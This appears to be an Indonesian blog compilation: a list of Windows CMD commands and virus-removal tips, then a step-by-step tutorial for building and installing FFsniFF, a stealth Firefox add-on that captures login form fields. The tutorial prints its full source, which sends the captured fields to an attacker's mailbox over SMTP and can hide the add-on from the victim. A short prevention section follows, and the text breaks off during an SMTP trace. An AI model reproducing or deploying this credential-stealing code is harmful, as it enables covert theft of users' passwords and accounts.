BROWSTAT - Mencari info domain,browser dan PDC
CACLS - Mengganti/mengubah file permissions
CALL - Memanggil sebuah program batch
CD - Memindahkan ke sebuah folder tertentu.
CHANGE - Mengubah Properties pada Terminal Server
CHKDSK - Memeriksa dan memperbaiki file system
CHKNTFS - Memeriksa NTFS file system
CHOICE - Menerima input keyboard ke dalam sebuah batch file
CIPHER - Encrypt-Decrypt files/folders
CleanMgr - Membersihkan secara otomatis Temporary files, recycle bin
CLEARMEM - Membersihkan memory
CLIP - meng-Copy STDIN ke Windows clipboard.
CLS - Membersihkan layar CMD
CLUSTER - Windows Clustering
CMD - Membuka layar CMD/ command prompt
COLOR - Mengganti warna pada window CMD
COMP - Membandingkan isi dari 2 atau lebih file
COMPACT - kompres file/folder di dalam partisi NTFS
COMPRESS - kompres file individu di dalam partisi NTFS
CON2PRT - Connect atau disconnect sebuah Printer
CONVERT - Convert FAT drive menjadi NTFS.
COPY - Copy 1 atau lebih file ke lokasi tertentu
CSVDE - Import/Export Active Directory data
DATE - Menampilkan/mengatur tanggal
Dcomcnfg - DCOM Configuration Utility
DEFRAG - Defragment hard drive
DEL - Menghapus 1 atau lebih file
DELPROF - Menghapus User Profile NT
DELTREE - Menghapus sebuah folder beserta subfolder
DevCon - Device Manager Command Line Utility
DIR - Menampilkan daftar file/folder dari sebuah drive
DIRUSE - Menampilkan disk usage/kapasitas disk
DISKCOMP - Membandingkan isi dari 2 buah floppy disk
DISKCOPY - Copy isi dari sebuah floppy disk ke floppy disk lainnya
DNSSTAT - DNS Statistics
DOSKEY - Mengedit command line,recall commands,dan create macros
DSADD - Menambah user (computer, group..) ke dalam active directory
DSQUERY - Menambah item ke dalam active directory
DSMOD - Modify user (computer, group..) di dalam active directory
ECHO - Menampilkan message pada monitor
ERASE - Menghapus satu atau lebih file
EXIT - keluar dari window CMD
EXPAND - Uncompress file
EXTRACT - Uncompress CAB files
FC - Membandingkan 2 buah file
FDISK - Disk Format dan partition
FIND - Mencari sebuah text string di dalam sebuah file
FINDSTR - Mencari strings di dalam files
FOR /F -Loop command: untuk beberapa files sekaligus
FOR - Loop command: all options Files, Directory, List
FORFILES - Batch process multiple files
FORMAT - Memformat sebuah disk
FREEDISK - Menampilkan free disk space (dalam bytes)
FSUTIL - File and Volume utilities
FTP - File Transfer Protocol
FTYPE - Menampilkan/mengubah file types yg digunakan dalam file extension
GLOBAL - Menampilkan daftar anggota dalam global groups
GOTO - Mengarahkan sebuah program batch untuk melompat ke labelled line
HELP - Online Help
HFNETCHK - Network Security Hotfix Checker
IF - Conditionally perform a command (perintah bersyarat)
IPCONFIG - Configure IP
KILL - Menghapus program dari memory
LABEL - Memberi/mengubah label disk
LOCAL - Menampilkan daftar anggota local groups
LOGEVENT - Menulis text ke dalam NT event viewer.
LOGOFF - Keluar dari system / Mengeluarkan user dari system
LOGTIME - mencatat tanggal dan waktu dalam sebuah file
MAPISEND - Mengirim e-mail dari command line
MEM - Menampilkan memory usage
MD - Create new folders
MODE - Configure a system device
MOUNTVOL - Mengatur Mount point dalam sebuah volume
MOVE - Memindahkan file dari sebuah folder ke folder lain
MOVEUSER - Menindahkan user dari sebuah domain ke domain lain
MSG - Mengirim message
MSIEXEC - Microsoft Windows Installer
MSINFO - Windows NT diagnostics
MSTSC - Terminal Server Connection (Remote Desktop Protocol)
MUNGE - Mencari dan Menganti text di dalam sebuah file (find & replace)
MV - Meng-copy file yang sedang/sementara digunakan
NET - Mengatur network resources
NETDOM - Domain Manager
NETSH - Configure network protocols
NETSVC - Command-line Service Controller
NBTSTAT - Menampilkan networking statistics (NetBIOS over TCP/IP)
NETSTAT - Menampilkan networking statistics (TCP/IP)
NOW - Menampilkan current Date and Time
NSLOOKUP - Name server lookup
NTBACKUP - Backup folders
NTRIGHTS - Edit user account rights (wilayah akses yg diizinkan oleh admin)
PATH - Menampilkan atau mengatur search path untuk executable files
PATHPING - Melacak route plus network latency dan packet loss
PAUSE - Menahan proses sebuah batch file and menampilkan message
PERMS - Menampilkan permissions (wilayah akses) user
PERFMON - Performance Monitor
PING - Menguji (test) network connection
POPD - Restore previous value dari sebuah directory yang di-save oleh PUSHD
PORTQRY - Menampilkan status ports dan service
PRINT - Print text file
PRNCNFG - Menampilkan, mengatur, atau mengubah nama printer
PRNMNGR - Menampilkan, menghapus, atau menambah daftar printer; set default printer
PROMPT - Mengubah command prompt
PsExec - Menjalankan proses jarak jauh (remote)
PsFile - Menunjukkan file2 yang dibuka dari jarak jauh
PsGetSid - Menampilkan SID sebuah computer atau user
PsInfo - Menampilkan informasi dari sebuah system
PsKill - Menghentikan proses melalui process ID
PsList - Menampilkan detail informasi dari sebuah proses
PsLoggedOn - Who's logged on (mengecek secara lokal atau melalui resource sharing)
PsLogList - Event log records
PsPasswd - Mengubah account password
PsService - Menampilkan dan mengubah services
PsShutdown - Shutdown atau reboot computer
PsSuspend - Suspend/menahan proces
PUSHD - Menyimpan/Save dan mengganti current directory
QGREP - Mencari kata/kalimat di dalam file yg sesuai dgn pola/line yg ditentukan.
RASDIAL - Mengatur RAS connections
RASPHONE - Mengatur RAS connections
RECOVER - Memulihkan/Recover damaged file dari sebuah disk defective (rusak).
REG - Membaca, mengatur, atau menghapus registry keys dan values
REGEDIT - Mengimport/mengeksport registry settings
REGSVR32 - Register/unregister file DLL atau ocx
REGINI - Mengubah Registry Permissions
REM - Merekam/mencatat comments (remarks) di dalam sebuah batch file
REN - mengubah nama file
REPLACE - Mengganti/Replace atau meng-update sebuah file dengan file line
RD - Delete folder
RDISK - Create Recovery Disk
RMTSHARE - Share folder atau printer
ROUTE - Memanipulasi network routing tables
RUNAS - Menjalankan sebuah program dgn menggunakan user account lain.
RUNDLL32 - Menjalankan sebuah DLL command (add/remove print connections)
SC - Service Control
SCHTASKS - Create or Edit Scheduled Tasks
SCLIST - Display NT Services
ScriptIt - Control GUI applications
SET - Display, set, atau remove environment variables
SETX - Set environment variables secara permanent
SHARE - Mendaftar atau edit sebuah file share atau print share
SHORTCUT - Create windows shortcut (.LNK file)
SHOWGRPS - Menampilkan daftar NT Workgroups atau user yang telah joined
SHOWMBRS - Menampilkan daftar Users yg merupakan member dari sebuah Workgroup
SHUTDOWN - Shutdown computer
SLEEP - Menunggu selama beberapa saat
SOON - Menjadwal(schedule) sebuah command untuk beberapa waktu kemudian
SORT - Sort input
START - membuka sebuah window baru, untuk menjalankan program atau command tertentu
SU - Switch User
SUBINACL - Edit file & folder Permissions, Ownership serta Domain
SUBST - Menyesuaikan sebuah path dengan drive letter
SYSTEMINFO - Menampilkan daftar system configuration
TASKLIST - Menampilkan daftar aplikasi dan service yang sedang berjalan
TIME - Menampilkan atau mengubah waktu pada system
TIMEOUT - Delay processing sebuah batch file
TITLE - Menentukan judul window untuk sebuah session CMD.EXE
TOUCH - mengubah timestamps sebuah file
TRACERT - Melacak route ke sebuah remote host
TREE - Tampilan grafis dari struktur folder
TYPE - Menampilkan isi dari sebuah text file
USRSTAT - Menampilkan daftar domain usernames dan last login
VER - Menampilkan version information
VERIFY - Memeriksa apakah files telah ter-save
VOL - Menampilkan disk label
WHERE - Mencari dan menampilkan files di dalam sebuah directory tree
WHOAMI - Menampilkan current UserName dan current domain
WINDIFF - Membandingkan isi dari dua atau lebih file.
WINMSD - Windows system diagnostics
WINMSDP - Windows system diagnostics II
WMIC - WMI Commands
XCACLS - Mengubah file permissions (hak akses)
XCOPY - Copy files dan folders
anda dapat berlogika sedikit seperti bermain network anda ketik net enter nanti akan keluar pilihan seperti view|use|user dan lainnya setelahnya anda dapat katik pilihan seperti net user enter.bisa juga menghapus virus flashdisk pertama ketik f:(karena punya saya di drive f:) enter ketik "attrib -s -h /s /d" tanpa tanda kutip enter ketik dir enter lihat virysnya biasanya format .exe,.inf,.ink,.dll.ini hapusnya pakai code begini
del autorun.inf trus di enter,ada konfirmasi y/n? ketik y di enter selesai.

basmi virus natquang.a n salinity.infbasmi virus natquang.a n salinity.inf

Virus Natquang.A merupakan salah satu virus yang menginfeksikan diri ke komputer korban melalui autorun. Dan ternyata kompi manusia biasa lagi – lagi terkena virus jenis ini tidak tau dari mana asal muasalanya yang pasti virus jenis ini mampu membuat komputer anda menjadi padat alias sejak melakukan booting komputer sudah sangat berat perjalanannya, bahkan bisa membuat komputer anda crash atau hang. Memang aneh padahal manusia biasa baru aja install ulang karena mau mencoba windows XP Black. Ternyata usut punya usut windows XP Black yang versi bajakan udah terinfeksi virus jenis ini yaitu virus Natwuang.A dan Salinity.Inf nya.

GAMBAR KOMPUTER ANDA BENAR – BENAR DIBUAT PADAT OLEH VIRUS INI
Nah, cara untuk membasmi nya adalah sebagai berikut:
1. Karena virus ini merupakan virus yang menyebar melalui autorun, maka matikan dulu autorun komputer anda, caranya:
a. Buka run…(start–>Run..)
b. Ketik gpedit.msc klik OK
b. Akan muncul jendela baru
d. Klik Administrative Templates –> System
e. Dibagian Kanan cari “Turn off Autoplay”
f. Klik kanan –> Properties
g. Akan muncul jendela baru
h. Klik Enabled –> Pilih All drives –> OK
i. Tutup Gpedit.msc dan Kini Windows telah bebas dari autorun
2. Lebih baik kita lebihwaspada dengan mematikan system restore siapa tau tuh virus bali lagi ke komputer kamu caranya dengan mematikan system restore kamu, caranya klik start –> accessories –> system tools –> Sytem Restore, kemudian klik tanda system restore setting dan klik tanda centang Turn Off system restore on all device.
3. Untuk virus natquang.A dan sality.inf kali ini Manusia Biasa anjurkan menggunakan ansav terbaru yang udah update tentunya. dan jika memang virus ini sudah merusak registry kalian silahkan gunakan saja tool dari ansav dijamin manthafff….. kalau masih gak bisa gunakan cara memperbaiki registry yang udah pernah saya publish di Cara singkat memperbaiki registry.


http://c124ck312.blogspot.com/2010/07/basmi-virus-natquanga-n-salinityinf.html

hacking server lan pakai ping

hacking password pakai firefox sniffing

Firefox adalah browser andalan saya, terutama untuk urusan penetration testing. Firefox memiliki banyak sekali addon/extension yang sangat membantu untuk bermacam-macam urusan. Namun tidak semua addon membantu pengguna, ada juga addon yang menyadap dan mengirimkan username/password pengguna ketika login ke email attacker, addon itu adalah FFsniFF.
Dalam artikel ini saya akan menunjukkan simulasi penyadapan password di browser korban dan mengirimkan hasil sadapannya ke email saya di ilmuhacking.com. Setelah itu saya akan jelaskan cara kerja FFsniFF dengan membedah source codenya.

Sekilas tentang addons Firefox
Addon firefox adalah program dalam javascript yang diload dan diaktifkan setiap firefox dijalankan. Addon ini diperlukan untuk melakukan hal-hal yang tidak disediakan oleh firefox (firefox hanya menyediakan fungsi-fungsi dasar saja). Antarmuka addon ada yang berbentuk ikon di status bar, toolbar atau boleh juga tidak memiliki antarmuka sama sekali. FFsniFF adalah contoh addon yang tidak memiliki antarmuka pengguna sama sekali, hal ini bisa dimaklumi karena memang addon ini harus bersifat stealth.
Addon dipaketkan dan disebarkan dalam bentuk file ZIP, namun ekstensi filenya bukan zip melainkan XPI (dibaca “zippy”). Dalam file xpi tersebut ada banyak file dan folder lain seperti source code javascript, gambar dan file xml deskriptor. File-file yang umumnya ada dalam sebuah paket zippy adalah:
1

2

3

4

5

6

7

8

9

10

11
exampleExt.xpi:

/install.rdf

/components/*

/components/cmdline.js

/defaults/

/defaults/preferences/*.js

/plugins/*

/chrome.manifest

/chrome/icons/default/*

/chrome/

/chrome/content/
install.rdf adalah deskriptor untuk keperluan instalasi. Selain itu di dalam paket itu juga ada file javascript yang berisi kode program yang menjalankan fungsi addon. Selebihnya adalah file-file untuk menangani user interface addon.
Membuat paket instalasi ffsniff.xpi
Langkah awal saya harus membuat paket instalasi addon ffsniff.xpi. Untuk itu saya harus mengunduh file sumber FFsniFF dari http://azurit.elbiahosting.sk/ffsniff/. Setelah diunduh, file tar.gz itu harus dimekarkan. Isi dari paket itu setelah dimekarkan adalah:
1

2

3

4

5

6

7

8

9
pkg_creator.py

src/

src/install.rdf

src/chrome/

src/chrome/content/

src/chrome/content/ffsniff/

src/chrome/content/ffsniff/ffsniffOverlay.xul

src/chrome/content/ffsniff/ffsniffOverlay_orig.js

src/chrome/content/ffsniff/contents.rdf
File tar.gz itu tidak bisa langsung diinstall ke firefox karena masih berbentuk kumpulan file yang harus diubah dan dibungkus menjadi paket zippy (xpi). Sebenarnya untuk membuat paket zippy sudah disediakan script pkg_creator.py dalam bahasa python, namun dalam artikel ini saya tidak memakai script itu agar saya bisa menunjukkan bagaimana proses pembuatan file xpi dari source code.
Setelah source berhasil didownload, berikutnya saya harus membuat file ffsniffOverlay.js, caranya adalah dengan mengcopy file ffsniffOverlay_orig.js dalam nama ffsniffOverlay.js. Setelah itu ffsniffOverlay.js akan saya edit untuk mengubah beberapa variabel berikut:
1

2

3

4

5

6

7
var send_from_host = "";

var send_from = "";

var send_to = "";

var subject = "";

var smtp_host = "";

var smtp_port = "";

var enable_hide = "";
Konfigurasi smtp untuk @ilmuhacking.com
MX record ilmuhacking.com
MX record ilmuhacking.com
Variabel-variabel tersebut adalah parameter untuk mengirim email melalui smtp. smtp_host berisi alamat smtp server yang dipakai untuk mengirim email. Sebaiknya gunakan smtp server yang bertanggung jawab untuk domain email yang kita tuju, dalam kasus ini domain email tujuan adalah @ilmuhacking.com. Oleh karena itu saya harus mencari smtp server yang bertanggung jawab untuk domain ilmuhacking.com. Cara mencarinya adalah dengan melihat MX record dari DNS ilmuhacking.com. Anda bisa gunakan layanan dnswatch.info untuk mencari MX record ilmuhacking.com. Perhatikan gambar di samping, terlihat bahwa ternyata smtp server untuk ilmuhacking.com berada di host yang sama, jadi smtp_host saya isi dengan ilmuhacking.com. Pada domain lain biasanya mail server adalah mail.domainanda.com.
send_from dan send_to saya isi dengan nilai yang sama, yaitu testing@ilmuhacking.com, alamat itu adalah alamat email asal dan tujuan. Perhatikan bahwa domain email sumber dan tujuan harus dalam domain yang sama (ilmuhacking.com) karena smtp server umumnya tidak bersedia mengirimkan email ke domain lain (istilahnya open relay) bila pengirim tidak memasukkan password dulu (anonymous).
enable_hide sengaja saya isi “no” untuk kemudahan, dalam kasus nyata variabel ini harus diisi dengan “yes” agar tersembunyi dari daftar addon sehingga tidak membuat korban curiga. Bila anda masih coba-coba, sebaiknya isi dulu dengan “no”.
smtp_port adalah port smtp server, port standar untuk layanan smtp adalah 25. subject adalah subject dari email yang akan berisi password korban.
1

2

3

4

5

6

7
var send_from_host = "ilmuhacking.com";

var send_from = "testing@ilmuhacking.com";

var send_to = "testing@ilmuhacking.com";

var subject = "Log Firefox Sniffer";

var smtp_host = "ilmuhacking.com";

var smtp_port = "25";

var enable_hide = "no";
Konfigurasi smtp untuk @telkom.net
Agar lebih memahami tentang konfigurasi email ini, saya beri contoh lain dengan email tujuan ke telkom.net.Dengan cara yang sama saya harus membaca MX record dari domain telkom.net, ternyata MX record untuk telkom.net ada 2: mx1.mail.plasa.com dan mx2.mail.plasa.com. Terserah mau pilih yang mana saja. Karena memakai smtp server telkom.net, email tujuan harus berada di domain @telkom.net, di sini saya pakai rizki.wicaksono@telkom.net. Alamat asal saya isi sama dengan email tujuan. Ini berarti saya mengirim email dari dan ke email yang sama, itu tidak masalah. send_from_host saya isi dengan telkom.net karena ini adalah domain. Jadi konfigurasi smtp untuk email tujuan @telkom.net adalah sebagai berikut:
1

2

3

4

5

6

7
var send_from_host = "telkom.net";

var send_from = "rizki.wicaksono@telkom.net";

var send_to = "rizki.wicaksono@telkom.net";

var subject = "Log Firefox Sniffer";

var smtp_host = "mx1.mail.plasa.com";

var smtp_port = "25";

var enable_hide = "no";
Membuat file ffsniff.jar
Setelah variabel-variabel di file ffsniffOverlay.js sudah diubah, langkah berikutnya adalah membuat file ffsniff.jar. Walaupun ekstensi filenya adalah jar, sebenarnya ini adalah file zip biasa. File-file yang dimasukkan dalam ffsniff.jar adalah:
content/ffsniff/contents.rdf

content/ffsniff/ffsniffOverlay.js

content/ffsniff/ffsniffOverlay.xul
Hasil file ffsniff.jar harus mengikutsertakan folder content/ffsniff, tidak boleh 3 file itu dizip tanpa mengikutsertakan foldernya. Jadi untuk membuat file ffsniff.jar harus berada di parent folder dari content/ffsniff. Anda bebas menggunakan program apa saja untuk kompresi zip ini, saya sendiri memakai WinRAR. Ketika dibuka dengan WINRAR isi dari ffsniff.jar tampak seperti gambar di bawah ini, perhatikan kolom pathnya harus berisi seperti itu.
ffsniff.jar list files
ffsniff.jar list files

Membuat file ffsniff.xpi
Setelah mendapatkan file ffsniff.jar, selanjutnya saya harus membuat paket instalasi ffsniff.xpi. File ini juga file zip biasa, walaupun ekstensinya .xpi. Isi file ffsniff.xpi adalah dua file berikut:
install.rdf

chrome/ffsniff.jar
Jangan lupa juga ffsniff.jar harus dizip dalam folder chrome. Gambar di bawah ini menunjukkan ffsniff.xpi yang dibuka dengan winrar, perhatikan juga kolom pathnya harus tepat seperti itu.
ffsniff.xpi file list
ffsniff.xpi file list

Instalasi Firefox Sniffer
Oke, kini selesai sudah proses pembuatan file instalasi addon FFsniffer. Kini saya bisa menginstall addon tersebut. Cara instalasi file xpi adalah dengan membuka Firefox, kemudian memasukkan path lokasi file xpi pada addressbar firefox. Setelah muncul daftar file di firefox, klik file xpi yang akan diinstall. Cara instalasi FFsniFF diperlihatkan pada gambar di bawah ini. Setelah berhasil install jangan lupa untuk restart firefox anda.
instalasi firefox sniffer
instalasi firefox sniffer
Mencoba login ke yahoo
Kini saya akan mencoba login ke yahoo dengan username rizkiwicaksono. Setelah login, saya periksa inbox email testing@ilmuhacking.com. Ternyata email hasil sniff password ketika login ke yahoo sudah masuk. Isi emailnya terlihat pada gambar di bawah ini.
log sniffer email
log sniffer email
Dalam email tersebut terlihat bahwa FFsniff tidak hanya mencatat username dan password tapi semua field dengan tag input (input type=”xxx”) dari form, yaitu: password field, hidden field, text field, checkbox. Selain itu FFsniff juga mencatat URL, nama field, jenis dan nilainya. FFsniFF hanya mengirimkan field yang ada isinya, bila field tersebut kosong, field tersebut tidak akan dikirim.
Email Sniffer Log
Mari kita perhatikan email yang dikirimkan FFsniFF. Header lengkap email yang dikirim FFsniff adalah sebagai berikut:
1

2

3

4

5

6

7

8

9
Return-path: 

Envelope-to: testing@ilmuhacking.com

Delivery-date: Fri, 27 Feb 2009 03:23:48 -0600

Received: from [202.43.xxx.xxx] (port=23982 helo=ilmuhacking.com)

by gator669.hostgator.com with esmtp (Exim 4.69)

(envelope-from )

id 1Lcywa-0002DK-Jj

for testing@ilmuhacking.com; Fri, 27 Feb 2009 03:23:48 -0600

Subject: Log Firefox Sniffer
Dalam email tersebut hanya ada 1 header Received, yaitu dari host 202.43.xxx.xxx (ip lengkap saya sensor). Hal ini menunjukkan bahwa smtp server yang saya pakai kebetulan adalah smtp server yang paling dekat dengan si penerima sehingga tidak perlu dioper ke smtp server lain. Berikut ini adalah header email FFsniFF yang dikirim ke telkom.net:
Return-Path: 

Received: from [125.160.17.193] (HELO mx1.mail.telkom.net)

by f1.c.plasa.com (CommuniGate Pro SMTP 4.3.9)

with ESMTPS id 690188427 for rizki.wicaksono@telkom.net; Wed, 04 Mar 2009 11:05:27 +0700

Received: from mx1.mail.plasa.com ([222.124.18.71])

by mx1.mail.telkom.net with esmtp id 1LeiKy-0001qP-O1

for rizki.wicaksono@telkom.net; Wed, 04 Mar 2009 11:04:20 +0700

X-IronPort-Anti-Spam-Filtered: true

X-IronPort-Anti-Spam-Result: AggYAH+MrUnKK6ce/2dsb2JhbACBTosbIQGGVoIPsFshAQKSPQEDgSwG

X-IronPort-AV: E=McAfee;i="5300,2777,5542"; a="119895912"

Received: from xxxxdtp.net.id (HELO telkom.net) ([202.43.xx.xx])

by mx1.mail.plasa.com with ESMTP; 04 Mar 2009 11:02:49 +0700

Subject: Log Firefox Sniffer

X-HAM-Check: YES

Date: Wed, 04 Mar 2009 11:05:27 +0700

Message-ID:
Dalam email ke telkom.net ada 3 header Received. Yang pertama adalah mx1.mail.plasa.com, ini adalah smtp server yang saya pakai di FFsniFF. Kemudian dari situ email dioper ke mx1.mail.telkom.net, dan terakhir dioper lagi ke f1.c.plasa.com, yang merupakan smtp server yang paling dekat dengan si penerima. Jadi sebenarnya saya bisa juga langsung mengirim email ke telkom.net dengan menggunakan smtp server f1.c.plasa.com. Namun karena MX record telkom.net menunjuk ke mx1.mail.telkom.net lebih baik saya pakai smtp server itu, walaupun perlu dioper sebanyak 2 kali untuk sampai di tujuan.
FFsniff mengirimkan email tersebut secara anonymous, artinya ffsniff tidak melakukan authentication sebelum mengirimkan email. SMTP server tidak mungkin menolak email yang ditujukan untuk domain yang dikelola dirinya sendiri, walaupun pengirimnya adalah anonymous (tanpa authentication), sebab bila smtp server menolak email untuk dirinya sendiri maka orang lain tidak akan bisa mengirim email ke domain itu.
Karena dikirimkan secara anonymous maka email tersebut tidak bisa ditujukan ke domain lain selain ilmuhacking.com karena smtp server tersebut kemungkinan besar akan menolak dijadikan titik relay pengiriman email ke domain lain. Bila ingin mengirimkan email untuk domain lain tidak bisa secara anonymous, sebelumnya harus memasukkan perintah smtp AUTH LOGIN dan memasukkan username/password dalam base64. Saya tidak akan menjelaskan terlalu panjang soal email, di lain kesempatan akan saya bahas detil cara kerja email.
Pencegahan
Bad guys already know about FFsniff since 3 years ago
FFsniff diciptakan pada bulan maret 2006, tepat 3 tahun yang lalu sehingga addon ini sudah dikenal luas sebagai salah satu tools hacking. Sekarang bagaimana caranya agar kita tidak menjadi korban addon ini?
Berikut ini tips agar tidak menjadi korban FFsniff:
  • Jangan sembarangan menginstall addon yang tidak anda kenal. Install addon hanya dari situs resmi Firefox Addon https://addons.mozilla.org/
  • Install Addon hanya dari situs yang menggunakan https. Penggunaan https ini sangat penting agar anda tidak tersesat mengakses situs palsu yang berusaha memberikan anda addon yang sudah diracuni spyware. Mengenai pentingnya https ini bisa anda baca di artikel: understanding https
  • firefox safe mode
    firefox safe mode
  • Bila anda berada di komputer publik, gunakan Firefox dalam Safe Mode (mode aman). Mode ini adalah mode menjalankan firefox dengan mematikan semua addon yang ada.
  • Walaupun FFsniFF dapat menyembunyikan diri dari daftar addon Firefox, namun tetap saja dia tidak mungkin bisa bersembunyi di file system. Jika anda ragu apakah firefox anda bersih dari FFsniFF, silakan buka folder Profile Mozilla Firefox anda. Biasanya di:
  • 1
    C:\Documents and Settings\\Application Data\Mozilla\Firefox\Profiles\\extensions\
    firefox extension folder
    firefox extension folder
    Kemudian perhatikan file install.rdf, dalam file itu terlihat nama dan deskripsi addon. Atau anda juga bisa melihat folder di dalamnya lagi untuk membaca file dot js dari ffsniff.
    How FFsniff Works
    Saya telah menunjukkan mulai dari mengunduh, menginstall dan kemudian mendapatkan password ketika ada yang login di firefox yang telah dipasang addon ini. Kini saatnya saya menjelaskan cara kerja FFsniff ini. Inti dari FFsniff ini ada pada file ffsniffOverlay.js. File ini berisi semua code yang melakukan sniffing. Berikut adalah source code lengkap ffsniffOverlay.js.
    1

    2

    3

    4

    5

    6

    7

    8

    9

    10

    11

    12

    13

    14

    15

    16

    17

    18

    19

    20

    21

    22

    23

    24

    25

    26

    27

    28

    29

    30

    31

    32

    33

    34

    35

    36

    37

    38

    39

    40

    41

    42

    43

    44

    45

    46

    47

    48

    49

    50

    51

    52

    53

    54

    55

    56

    57

    58

    59

    60

    61

    62

    63

    64

    65

    66

    67

    68

    69

    70

    71

    72

    73

    74

    75

    76

    77

    78

    79

    80

    81

    82

    83

    84

    85

    86

    87

    88

    89

    90

    91

    92

    93

    94

    95

    96

    97

    98

    99

    100

    101

    102

    103

    104

    105

    106

    107

    108

    109

    110

    111

    112

    113

    114

    115

    116

    117

    118

    119

    120

    121

    122

    123

    124

    125

    126

    127

    128
    var transportService = Components.classes["@mozilla.org/network/socket-transport-service;1"].getService(Components.interfaces.nsISocketTransportService);

    var transport = "";

    var outstream = "";

    var instream = Components.classes["@mozilla.org/scriptableinputstream;1"].createInstance(Components.interfaces.nsIScriptableInputStream);

    var stream = "";

    // find out FF version

    var appInfo = Components.classes["@mozilla.org/xre/app-info;1"].getService(Components.interfaces.nsIXULAppInfo);

    var versionChecker = Components.classes["@mozilla.org/xpcom/version-comparator;1"].getService(Components.interfaces.nsIVersionComparator);



    var data = "";

    var data0 = "EHLO " + send_from_host + "\r\n"

    var data1 = "MAIL FROM: <" + send_from + ">\r\n"

    var data2 = "RCPT TO: <" + send_to + ">\r\n"

    var data3 = "DATA\r\n"

    var data4 = "\r\n.\r\n"

    var data5 = "QUIT\r\n"

    function send_data() {

    transport = transportService.createTransport(null, 0, smtp_host, smtp_port, null);

    outstream = transport.openOutputStream(0, 0, 0);

    stream = transport.openInputStream(0, 0, 0);

    instream.init(stream);



    // this will avoid 'Improper use of SMTP command pipelining'

    // error on SMTP servers

    outstream.write(data0, data0.length);

    while (instream.available() == 0) {}

    instream.read(instream.available());



    outstream.write(data1, data1.length);

    while (instream.available() == 0) {}

    instream.read(instream.available());



    outstream.write(data2, data2.length);

    while (instream.available() == 0) {}

    instream.read(instream.available());



    outstream.write(data3, data3.length);

    while (instream.available() == 0) {}

    instream.read(instream.available());



    outstream.write(data, data.length);

    // don't read here cos no data was send to us

    //while (instream.available() == 0) {}

    //instream.read(instream.available());



    outstream.write(data4, data4.length);

    while (instream.available() == 0) {}

    instream.read(instream.available());



    outstream.write(data5, data5.length);

    while (instream.available() == 0) {}



    outstream.close();

    instream.close();

    }

    if (versionChecker.compare(appInfo.version, "3.0") >= 0) {

    var workingThread = function() {

    };



    workingThread.prototype = {

    run: function() {

    send_data();

    }

    };

    } else {

    var runnable = {

    run: function() {

    send_data();

    }

    }

    }

    function sniff() {

    // if we are running under 3.0 or later

    if (versionChecker.compare(appInfo.version, "3.0") >= 0) {

    var thread = Components.classes["@mozilla.org/thread-manager;1"].getService().newThread(0);

    thread.dispatch(new workingThread(), thread.DISPATCH_NORMAL);

    } else {

    var thread = Components.classes["@mozilla.org/thread;1"].getService(Components.interfaces.nsIThread);

    thread.init(runnable, 512*1024, Components.interfaces.nsIThread.PRIORITY_NORMAL, Components.interfaces.nsIThread.SCOPE_LOCAL, Components.interfaces.nsIThread.STATE_UNJOINABLE);

    }

    }



    function do_sniff() {

    var ok = 0;

    var hesla = window.content.document.getElementsByTagName("input");

    data = "";

    for (var i = 0; i < hesla.length; i++) {

    if (hesla[i].value != "") {

    if (hesla[i].type == "password") {

    ok = 1;

    }

    if (hesla[i].name == "") {

    data += hesla[i].type + ":" + ":" + hesla[i].value + "\n";

    }

    else {

    data += hesla[i].type + ":" + hesla[i].name +":" + hesla[i].value + "\n";

    }

    }

    }

    if (ok == 1) {

    data = "Subject: " + subject + "\r\n\r\n" + window.top.content.document.location + "\n" + "type:name:value\n" + "---------------\n" + data;

    sniff()

    }

    }

    function hide_me() {

    var RDFService = Components.classes["@mozilla.org/rdf/rdf-service;1"].getService(Components.interfaces.nsIRDFService);

    var Container = Components.classes["@mozilla.org/rdf/container;1"].createInstance(Components.interfaces.nsIRDFContainer);

    var extensionDS = Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).datasource;

    var root = RDFService.GetResource("urn:mozilla:item:root");

    var nameArc = RDFService.GetResource("http://www.mozilla.org/2004/em-rdf#name");

    Container.Init(extensionDS, root);

    var elements = Container.GetElements();

    while (elements.hasMoreElements()) {

    var element = elements.getNext();

    var name = "";

    var target = extensionDS.GetTarget(element, nameArc, true);

    if (target) {

    name = target.QueryInterface(Components.interfaces.nsIRDFLiteral).Value;

    if (name == "FFsniFF") {

    Container.RemoveElement(element, true);

    }

    }

    }

    }

    if (enable_hide == "yes") {

    hide_me();

    }

    window.addEventListener("submit", do_sniff, false);
    Perhatikan baris ke-127 pada source di atas, bila enable_hide diset “yes”, maka ffsniff akan menjalankan fungsi hide_me(). hide_me() bertugas menghilangkan FFsniff dari daftar addon agar kehadirannya tidak disadari pengguna. Cara menyembunyikan diri adalah dengan cara menjalankan fungsi Container.RemoveElement (baris ke-122) hanya bila element itu bernama “FFsniFF”.
    how ffsniff works
    how ffsniff works
    Fungsi sniffing sesungguhnya ada pada baris terakhir. Pada baris terakhir, terdapat fungsi addEventListener(). Fungsi ini berguna untuk mengaitkan event submit dengan fungsi do_sniff. Artinya fungsi do_sniff akan dijalankan setiap kali terjadi event submit. Event submit akan terjadi bila ada request POST di browser, antara lain dengan melalui klik tombol bertipe submit (input type=”submit”). Namun tidak hanya melalui klik saja, submit bisa juga dilakukan oleh javascript. Dengan cara apapun, bila terjadi request POST di browser, event submit akan terjadi, dan artinya fungsi do_sniff juga akan dipanggil. Untuk lebih jelasnya perhatikan gambar di atas.
    Kini fokus perhatian kita pindah ke fungsi do_sniff (baris ke-84). Dalam fungsi sniff, ffsniffer mengambil daftar semua tag yang ada dengan fungsi window.content.document.getElementsByTagName(“input”). Kemudian semua field tersebut akan digabung dalam variabel string data. Hanya bila dalam form tersebut terdapat password field (input type=”password”), maka ffsniffer akan mengirimkan email, bila hanya form biasa (bukan form login), ffsniffer tidak akan mengirim email.
    Bila mengandung password field, berikutnya fungsi sniff (baris ke-73) akan dijalankan. Fungsi sniff ini tugasnya hanya membuat dan menjalankan thread. Thread tersebut bertugas melakukan pengiriman email dengan memanggil fungsi send_data (baris ke-17). Fungsi send_data akan membuka koneksi tcp ke smtp server, kemudian mengirimkan perintah smtp untuk mengirim email. Dengan menggunakan sniffer Wireshark, berikut adalah komunikasi yang terjadi ketika email dikirim ke telkom.net:
    1

    2

    3

    4

    5

    6

    7

    8

    9

    10

    11

    12

    13

    14

    15

    16

    17

    18

    19

    20

    21

    22

    23

    24

    25

    26

    27

    28

    29

    30

    31

    32

    33

    34
    220-mx1.mail.plasa.com ESMTP

    220 UBE, porn, and abusive content not allowed

    EHLO telkom.net

    250-mx1.mail.plasa.com

    250-8BITMIME

    250 SIZE 20971520

    MAIL FROM:

